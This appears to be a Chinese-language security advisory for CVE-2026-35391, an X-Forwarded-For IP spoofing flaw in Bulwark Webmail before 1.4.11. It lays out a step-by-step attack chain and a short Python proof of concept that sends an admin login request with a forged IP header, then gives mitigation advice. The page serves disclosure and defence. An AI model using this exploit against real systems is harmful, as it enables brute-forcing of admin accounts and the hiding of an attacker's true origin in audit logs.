CVE-2026-35391 CVSS 7.5 高危

CVE-2026-35391 Bulwark Webmail IP欺骗漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35391

漏洞类型

IP欺骗

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Bulwark Webmail

漏洞概述

Bulwark Webmail 1.4.11之前版本存在安全漏洞。由于`getClientIP()`函数错误信任`X-Forwarded-For`头部最左侧条目，攻击者可伪造源IP地址。此举可绕过基于IP的速率限制以进行暴力破解攻击，或伪造审计日志来源，该问题已在1.4.11版本修复。

技术细节

该漏洞位于 `lib/admin/session.ts` 文件的 `getClientIP()` 函数中。在反向代理或负载均衡的典型部署架构中，`X-Forwarded-For` (XFF) 头部用于传递客户端的原始 IP 地址。然而，XFF 头部的格式通常为“客户端IP, 代理1 IP, 代理2 IP”，其中最左侧的 IP 是由客户端初始请求提供的，因此极易被伪造。Bulwark Webmail 在早期版本中错误地信任了 XFF 头部的最左侧条目作为真实客户端 IP。攻击者可以通过简单地在 HTTP 请求头中注入 `X-Forwarded-For: <任意IP>` 来欺骗后端系统。这种信任边界 violation 导致了严重的后果：首先，基于 IP 的速率限制机制失效，攻击者可以不断变换伪造的 IP 对管理员账户进行暴力破解而不被封锁；其次，系统审计日志会记录这些伪造的 IP，导致安全事件溯源困难，掩盖了攻击者的真实位置。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标运行的是Bulwark Webmail且版本低于1.4.11。

STEP 2

2. 构造恶意请求

攻击者编写脚本或使用代理工具（如Burp Suite），在HTTP请求头中添加或修改`X-Forwarded-For`字段，将其设置为任意IP地址（如127.0.0.1或目标内网IP）。

STEP 3

3. 绕过安全防护

服务器后端`getClientIP()`函数读取被篡改的头部信息，将其视为客户端真实IP，从而绕过基于IP的登录频率限制。

STEP 4

4. 实施攻击

攻击者利用绕过机制进行管理员密码暴力破解，或者大量发送恶意请求并在审计日志中留下伪造的IP地址，以掩盖真实身份。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_url, spoofed_ip):
    """
    PoC for CVE-2026-35391: Demonstrates IP spoofing via X-Forwarded-For.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "X-Forwarded-For": spoofed_ip
    }
    
    # Example endpoint: login page or any endpoint that logs IP
    login_endpoint = f"{target_url}/api/login"
    
    data = {
        "username": "admin",
        "password": "test_password"
    }

    try:
        response = requests.post(login_endpoint, headers=headers, data=data)
        print(f"[+] Sent request with spoofed IP: {spoofed_ip}")
        print(f"[+] Response Status Code: {response.status_code}")
        if response.status_code == 200:
            print("[+] Request accepted. Server likely trusted the spoofed IP.")
        else:
            print("[-] Request blocked or failed.")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://localhost:8080" # Replace with actual target
    fake_ip = "1.1.1.1"
    exploit_poc(target, fake_ip)

影响范围

Bulwark Webmail < 1.4.11

防御指南

临时缓解措施

如果无法立即升级，应在网络边界设备（如Nginx、HAProxy或WAF）上强制移除或重写传入的`X-Forwarded-For`头部，确保后端应用只接收由可信代理添加的IP地址。此外，可以暂时启用多因素认证（MFA）以缓解暴力破解风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表